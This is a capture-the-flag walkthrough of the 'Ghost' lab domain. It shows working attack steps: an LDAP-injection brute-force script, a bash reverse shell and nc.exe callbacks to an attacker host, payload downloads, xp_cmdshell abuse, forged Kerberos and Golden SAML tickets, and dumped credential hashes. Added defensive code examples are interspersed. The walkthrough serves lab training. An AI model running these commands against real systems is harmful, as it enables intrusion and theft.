Basic information

Port scan

Ports 80, 8008 and 8443 are open, plus the usual domain-controller ports:

$ nmap -sC -sV 10.10.11.24
Starting Nmap 7.95 ( https://nmap.org ) at 2024-07-15 14:32 CST
Nmap scan report for 10.10.11.24
Host is up (0.090s latency).
Not shown: 982 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-15 06:25:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after: 2124-06-19T15:55:55
443/tcp open https?
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after: 2124-06-19T15:55:55
|_ssl-date: TLS randomness does not represent time
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after: 2124-06-19T15:55:55
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after: 2124-06-19T15:55:55
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-15T06:26:48+00:00; -7m49s from scanner time.
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Not valid before: 2024-06-16T15:49:55
|_Not valid after: 2024-12-16T15:49:55
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8008/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Ghost
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 5 disallowed entries
|_/ghost/ /p/ /email/ /r/ /webmentions/receive/
|_http-generator: Ghost 5.78
8443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
| http-title: Ghost Core
|_Requested resource was /login
|_http-server-header: nginx/1.18.0 (Ubuntu)
| tls-nextprotoneg:
|_ http/1.1
| ssl-cert: Subject: commonName=core.ghost.htb
| Subject Alternative Name: DNS:core.ghost.htb
| Not valid before: 2024-06-18T15:14:02
|_Not valid after: 2124-05-25T15:14:02
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: Host: DC01; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -7m49s, deviation: 0s, median: -7m49s
| smb2-time:
| date: 2024-07-15T06:26:07
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.76 seconds

80

Visiting it directly returns a 404:

8008

A Ghost blog:

8443

Ghost Core; the login uses ADFS and redirects to the federation.ghost.htb domain:

Subdomain scan

Add the subdomain seen on 8443 to the hosts file, then fuzz for other subdomains:

10.10.11.24 ghost.htb federation.ghost.htb

Port 8008 has to be used, because port 80 returns 404 by default:

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://ghost.htb:8008/" -H 'Host: FUZZ.ghost.htb' -fs 0,7676

intranet [Status: 307, Size: 3968, Words: 52, Lines: 1, Duration: 112ms]

intranet

After adding it to the hosts file, it shows a login page:

intranet

LDAP injection

The login request shows that LDAP is used behind it, and a quick test reveals LDAP injection: with an asterisk as both username and password, we are logged in to the intranet:

gitea

The news section mentions Gitea, gives the username gitea_temp_principal, and notes that the Gitea password can be tested on the intranet:

forum

The forum mentions Bitbucket at bitbucket.ghost.htb, so Gitea is presumably at gitea.ghost.htb:

gitea password

With that information, the LDAP injection is used to brute-force, one character at a time, the password of gitea_temp_principal that is used to log in to Gitea:

szrr8kpc3z6onlqf

ldap_brute.py

From the BF forum:

import string
import requests

url = 'http://intranet.ghost.htb:8008/login'

# Next-Action identifies the Next.js server action that handles the login form
headers = {
    'Host': 'intranet.ghost.htb:8008',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate, br',
    'Next-Action': 'c471eb076ccac91d6f828b671795550fd5925940',
    'Connection': 'keep-alive'
}

passw = ""
while True:
    for char in string.ascii_lowercase + string.digits:
        # The secret is placed in the LDAP filter unescaped, so
        # '<prefix><char>*' only matches if the real password starts with it
        files = {
            '1_ldap-username': (None, 'gitea_temp_principal'),
            '1_ldap-secret': (None, f'{passw}{char}*'),
            '0': (None, '[{},"$K1"]')
        }
        # Do not follow redirects: a successful login answers with a 303,
        # which would otherwise be replaced by the redirect target's status
        res = requests.post(url, headers=headers, files=files, allow_redirects=False)
        if res.status_code == 303:
            passw += char
            print(f"Passwd: {passw}")
            break
    else:
        # no character extended the prefix, so the password is complete
        break
print(passw)
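The oracle the script above drives exists because the intranet concatenates the submitted fields straight into an LDAP search filter. The following is an added example, not code from the original post or from the intranet: it shows the unsafe filter construction beside an RFC 4515-escaped version and a reject check. The attribute names uid and userPassword are assumptions.

```python
import re

# RFC 4515 (section 3): characters that carry meaning inside a search filter value
# and the escaped form each must take so the value is matched literally.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape user input before it is placed inside an LDAP filter."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def contains_filter_metachars(value: str) -> bool:
    """True if the input contains filter syntax; usable as a reject-and-log check in
    front of the login handler (a legitimate password never needs to be a filter)."""
    return any(ch in _LDAP_ESCAPES for ch in value)


def login_filter_unsafe(username: str, secret: str) -> str:
    """Raw concatenation, as the intranet evidently does: '*' in either field becomes
    a wildcard and 's*' becomes a prefix test, which is the per-character oracle.
    Attribute names (uid, userPassword) are assumed."""
    return f"(&(uid={username})(userPassword={secret}))"


def login_filter_safe(username: str, secret: str) -> str:
    """Same filter shape, but every metacharacter in the input is escaped, so 's*'
    can only match an account whose password is literally 's*'.  The better design
    is not to compare the password in a filter at all but to bind as the user."""
    return (f"(&(uid={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(secret)}))")
```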

gitea

Log in to Gitea with the recovered credentials:

gitea_temp_principal
szrr8kpc3z6onlqf

extra lfi

Reviewing the code, one function concatenates the received extra parameter onto a directory and reads the resulting file, so there is a likely LFI:

api key

Calling it requires an API key; the README gives the public API key and states that the DEV_INTRANET_KEY environment variable holds the internal API key:

scan.rs

Also, in the dev API the scan function invokes bash directly, a likely command injection:

LFI

So use the public API key to read the environment variables:

http://ghost.htb:8008/ghost/api/v3/content/posts/?extra=../../../../proc/self/environ&key=a5af628828958c976a3b6cc81a

DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe
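The environment read works because the handler joins extra onto its directory and lets the filesystem resolve the .. segments. As an added example (not the intranet's own code, which is Rust and not shown here), this reproduces that defect beside a contained version; the base directory /srv/intranet/posts is an assumption.

```python
import posixpath
import re

# Assumed location of the files the content endpoint serves; the real directory is
# not shown on the page.
BASE_DIR = "/srv/intranet/posts"

# Only bare file names are legitimate values for 'extra': no separators, no leading dot.
_NAME_OK = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def resolve_unsafe(extra: str) -> str:
    """Mirrors the defect: user input concatenated onto the directory and normalised by
    the filesystem, so '..' segments walk out of BASE_DIR (here into /proc)."""
    return posixpath.normpath(BASE_DIR + "/" + extra)


def resolve_safe(extra: str):
    """Allow-list the name, then confirm the normalised result is still inside BASE_DIR.
    Returns the path to read, or None when the request must be refused."""
    if "\x00" in extra or not _NAME_OK.fullmatch(extra):
        return None
    candidate = posixpath.normpath(BASE_DIR + "/" + extra)
    if candidate != BASE_DIR and not candidate.startswith(BASE_DIR + "/"):
        return None  # defence in depth: never rely on the regex alone
    return candidate
```

The same primitive reads any file the service account can open, which is why a secret like DEV_INTRANET_KEY should not sit in the process environment of an internet-facing handler.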

Command injection

With the dev API key in hand, call scan and inject a command:

curl http://intranet.ghost.htb:8008/api-dev/scan -X POST -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url": "0<&196;exec 196<>/dev/tcp/10.10.14.10/4444; /bin/bash <&196 >&196 2>&196"}'
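The injection succeeds because the URL from the JSON body is pasted into a bash command line, where ; < > & are syntax rather than data. The following added example (not scan.rs, which is not reproduced on the page) contrasts that pattern with an argv-based call that never involves a shell; the wrapped curl command is an assumption.

```python
import re
import subprocess
from urllib.parse import urlsplit

# Assumed: the command the 'scan' endpoint wraps.  scan.rs itself is not shown on the page.
SCANNER = ["curl", "--silent", "--show-error", "--max-time", "5"]

# One or more DNS labels: letters, digits and inner hyphens only.
_HOST_OK = re.compile(r"^[a-z0-9]([a-z0-9-]{0,62}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,62}[a-z0-9])?)*$")


def build_unsafe(url: str) -> list:
    """The pattern the page describes: the request body is pasted into a bash command
    line, so ';', '<', '>', '&' and '$(...)' inside the URL are parsed as shell syntax."""
    return ["bash", "-c", " ".join(SCANNER) + " " + url]


def validate_url(url: str) -> str:
    """Accept only an http(s) URL whose host is a plain DNS name; raise otherwise."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme must be http or https")
    if not parts.hostname or not _HOST_OK.match(parts.hostname):
        raise ValueError("host is not a DNS name")
    return url


def is_acceptable(url: str) -> bool:
    """Boolean form of validate_url, for logging and testing."""
    try:
        validate_url(url)
        return True
    except ValueError:
        return False


def build_safe(url: str) -> list:
    """argv for execve: the URL is a single argument and no shell ever sees it."""
    return SCANNER + [validate_url(url)]


def run_scan(url: str) -> subprocess.CompletedProcess:
    return subprocess.run(build_safe(url), capture_output=True, text=True, timeout=10)
```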

That gives root inside a container:

docker-entrypoint.sh

docker-entrypoint.sh in the root directory contains SSH connection details:

sshpass -p 'uxLmt*udNc6t3HrF' ssh -o "StrictHostKeyChecking no" florence.ramirez@ghost.htb@dev-workstation exit

MSSQL (unintended route)

(Logging in to MSSQL directly is the unintended route; the intended route is covered later.)

The florence.ramirez credentials obtained above can connect to MSSQL and run a BloodHound collection:

python3 examples/mssqlclient.py florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-auth

Only guest, but there is a linked server, OSEP style:

What follows is the standard sequence: hop across the link, impersonate a login, execute commands:

SQL (GHOST\florence.ramirez guest@master)> enum_links
SQL (GHOST\florence.ramirez guest@master)> use_link [PRIMARY]
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> use master
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> enum_impersonate
SQL >[PRIMARY] (bridge_corp bridge_corp@master)> exec_as_login sa
SQL >[PRIMARY] (sa dbo@master)> enable_xp_cmdshell
SQL >[PRIMARY] (sa dbo@master)> xp_cmdshell whoami

shell

There is antivirus on the host; a plain nc shell:

xp_cmdshell powershell -c "Invoke-WebRequest -Uri http://10.10.14.10:7777/nc.exe -OutFile $env:TEMP\nc.exe"
xp_cmdshell %TEMP%\nc.exe -e cmd.exe 10.10.14.10 4444

meterpreter

Then, after some AV evasion of our own, get a Meterpreter session:

# handler
set AutoRunScript "migrate -n explorer.exe"

wget http://10.10.14.10:7778/miao.exe -O miao.exe
start-process miao.exe

system

Then the usual MSSQL-to-SYSTEM step: Meterpreter's one-click getsystem drops the session immediately, but since it is known to use EFS, simply run EfsPotato manually:

wget http://10.10.14.10:7778/EfsPotato.exe -O EfsPotato.exe

.\EfsPotato.exe whoami.exe
.\EfsPotato.exe miao.exe

PRIMARY hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:41515af3ada195029708a53d941ab751:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:69eb46aa347a8c68edb99be2725403ab:::
PRIMARY$:1000:aad3b435b51404eeaad3b435b51404ee:27f92da5e3d79962020ddebc08ed7d70:::
GHOST$:1103:aad3b435b51404eeaad3b435b51404ee:dae1ad83e2af14a379017f244a2f5297::

Domain trust

What we hold now is the corp.ghost.htb child domain, and PRIMARY is its DC; this is the basic child-to-parent escalation:

bloodhound-python -ns 10.10.11.24 -dc dc01.ghost.htb -d ghost.htb -c All -u florence.ramirez -p 'uxLmt*udNc6t3HrF' --zip

IEX ((new-object net.webclient).downloadstring('http://10.10.14.10:7777/PowerView.ps1'))

mimikatz # lsadump::dcsync /all /csv
502 krbtgt 69eb46aa347a8c68edb99be2725403ab 514
1103 GHOST$ dae1ad83e2af14a379017f244a2f5297 2080
500 Administrator 41515af3ada195029708a53d941ab751 512
1000 PRIMARY$ 27f92da5e3d79962020ddebc08ed7d70 532480

ghost.htb S-1-5-21-4084500788-938703357-3654145966
corp.ghost.htb S-1-5-21-2034262909-2733679486-179904498

python3 examples/ticketer.py -nthash dae1ad83e2af14a379017f244a2f5297 -domain-sid S-1-5-21-2034262909-2733679486-179904498 -domain corp.ghost.htb -extra-sid S-1-5-21-4084500788-938703357-3654145966-519 -spn "krbtgt/ghost.htb" Administrator

export KRB5CCNAME=./Administrator.ccache
python3 examples/getST.py -k -no-pass -debug -spn "CIFS/DC01.ghost.htb" "ghost.htb/Administrator@ghost.htb"

export KRB5CCNAME=./Administrator@ghost.htb@CIFS_DC01.ghost.htb@GHOST.HTB.ccache
python3 examples/secretsdump.py -k -no-pass -debug Administrator@DC01.ghost.htb -dc-ip 10.10.11.24 -just-dc-ntlm
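The ticketer.py ticket above carries the forest root's Enterprise Admins SID (…-519) as an extra SID in a ticket issued by the child domain. On an external or forest trust, SID filtering strips such SIDs; inside one forest the parent-child trust does not apply it, which is why the forest, not the domain, is the security boundary. The following added example (not from the original post) models that filter and the matching detection check over the two domain SIDs the page reports; the PAC is simplified to a list of SIDs.

```python
# Domain SIDs as reported on the page
GHOST_SID = "S-1-5-21-4084500788-938703357-3654145966"   # ghost.htb, forest root
CORP_SID = "S-1-5-21-2034262909-2733679486-179904498"    # corp.ghost.htb, child domain
ENTERPRISE_ADMINS_RID = 519


def split_sid(sid: str):
    """Split 'S-1-5-21-a-b-c-RID' into (domain SID, RID).  Other SIDs are well-known
    (for example S-1-5-11, Authenticated Users) and come back as (None, None)."""
    if not sid.startswith("S-1-5-21-"):
        return None, None
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def filter_sids(trusted_domain_sid: str, pac_sids: list):
    """SID filtering as applied on a quarantined, external or forest trust: every
    domain SID that does not belong to the trusted domain is discarded before the
    PAC is honoured.  Returns (kept, dropped); well-known SIDs pass through."""
    kept, dropped = [], []
    for sid in pac_sids:
        domain, _ = split_sid(sid)
        (kept if domain in (None, trusted_domain_sid) else dropped).append(sid)
    return kept, dropped


def foreign_admin_sids(local_domain_sid: str, pac_sids: list):
    """Detection angle: SIDs from another domain that grant forest-wide privilege.
    A child-domain ticket carrying <root>-519 is exactly the forged ticket above."""
    hits = []
    for sid in pac_sids:
        domain, rid = split_sid(sid)
        if domain and domain != local_domain_sid and rid == ENTERPRISE_ADMINS_RID:
            hits.append(sid)
    return hits
```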

Intended route: user

florence.ramirez is a member of the IT group. Earlier we saw that bitbucket.ghost.htb does not resolve, yet justin keeps visiting it, so add a DNS record for it, capture justin's Net-NTLM hash and crack it; this part is similar to Intelligence:

python3 dnstool.py -u GHOST\\florence.ramirez -p 'uxLmt*udNc6t3HrF' -r bitbucket.ghost.htb -a add -d 10.10.14.10 10.10.11.24

sudo python3 Responder.py -i 10.10.14.10 -v

justin.bradley::ghost...

Crack justin's password, log in to the DC over WinRM and get user.txt:

sudo hashcat -m 5600 hash.txt ~/Tools/dict/rockyou.txt

Qwertyuiop1234$$

evil-winrm -i 10.10.11.24 -u 'justin.bradley' -p 'Qwertyuiop1234$$'

GMSA

Then justin reads the gMSA password:

netexec ldap 10.10.11.24 -u 'justin.bradley' -p 'Qwertyuiop1234$$' --gmsa

Account: adfs_gmsa$ NTLM: 4f4b81c5f6a9c1931310ece55a02a8d6

adfs_gmsa$ can also log in:

evil-winrm -i 10.10.11.24 -u 'adfs_gmsa$' -H 4f4b81c5f6a9c1931310ece55a02a8d6

ADFS

Logging in to the ADFS web app seen earlier with any other account shows a message that only Administrator is allowed, so an Administrator identity has to be forged: the basic approach is to run ADFSDump from the adfs_gmsa$ shell to gather the key material, then perform a Golden SAML attack:

.\ADFSDump.exe
# ADFSDump returns two private keys; trying both shows that the second one is the correct one

python ADFSpoof.py -b TKSKey.bin DKMKey.bin -s core.ghost.htb saml2 --endpoint https://core.ghost.htb:8443/adfs/saml/postResponse --nameidformat urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress --nameid Administrator@ghost.htb --rpidentifier https://core.ghost.htb:8443 --assertions '<Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn"><AttributeValue>Administrator@ghost.htb</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/claims/CommonName"><AttributeValue>Administrator</AttributeValue></Attribute>'

MSSQL

From here it is essentially the same as the MSSQL part of the unintended route, via the linked server:

EXECUTE('EXECUTE AS LOGIN = ''sa'' EXEC SP_CONFIGURE ''show advanced options'', 1;reconfigure;EXEC SP_CONFIGURE ''xp_cmdshell'' , 1;reconfigure;exec xp_cmdshell ''whoami''') AT "PRIMARY"

flags

Log in with the recovered Administrator hash:

evil-winrm -i 10.10.11.24 -u 'Administrator' -H '1cdb17d5c14ff69e7067cffcc9e470bd'

DC01 hashdump

python3 examples/secretsdump.py -k -no-pass Administrator@DC01.ghost.htb -dc-ip 10.10.11.24 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1cdb17d5c14ff69e7067cffcc9e470bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0cdb6ae71c3824f2da2815f69485e128:::
kathryn.holland:3602:aad3b435b51404eeaad3b435b51404ee:0adf6114ba230ef8f023eca3c0d1af50:::
cassandra.shelton:3603:aad3b435b51404eeaad3b435b51404ee:96d2251e44e42816314c08b8e1f11b87:::
robert.steeves:3604:aad3b435b51404eeaad3b435b51404ee:7e2e1e1163ff3fa9304ecd8df6f726fe:::
florence.ramirez:3606:aad3b435b51404eeaad3b435b51404ee:29542931896c7e7a9fbca17b0dd8ab6a:::
justin.bradley:3607:aad3b435b51404eeaad3b435b51404ee:a2be8ec65d6b212138cb36422ed32f46:::
arthur.boyd:3608:aad3b435b51404eeaad3b435b51404ee:b5b7f0787f3c07f42958d33518ae19a5:::
beth.clark:3610:aad3b435b51404eeaad3b435b51404ee:1582f51fcd02e2e5316d497f2552bb83:::
charles.gray:3611:aad3b435b51404eeaad3b435b51404ee:d2fe7f2c7484fc550cac49836eabca3d:::
jason.taylor:3612:aad3b435b51404eeaad3b435b51404ee:0159e6bd4326812f9a6c406ea84035e6:::
intranet_principal:3614:aad3b435b51404eeaad3b435b51404ee:e9fac15124e1d927cbd71f851792b04f:::
gitea_temp_principal:3615:aad3b435b51404eeaad3b435b51404ee:2058fa4502750fa5d7ebd874b1ea43a1:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e6c3d61860f92e30e8e9744ac5d9783b:::
LINUX-DEV-WS01$:3630:aad3b435b51404eeaad3b435b51404ee:c6ca9ac2f26669168665c4ba16981a8b:::
adfs_gmsa$:4101:aad3b435b51404eeaad3b435b51404ee:4f4b81c5f6a9c1931310ece55a02a8d6:::
GHOST-CORP$:2101:aad3b435b51404eeaad3b435b51404ee:ba8ef93f824c0f3b1e98037ae08ab68c:::
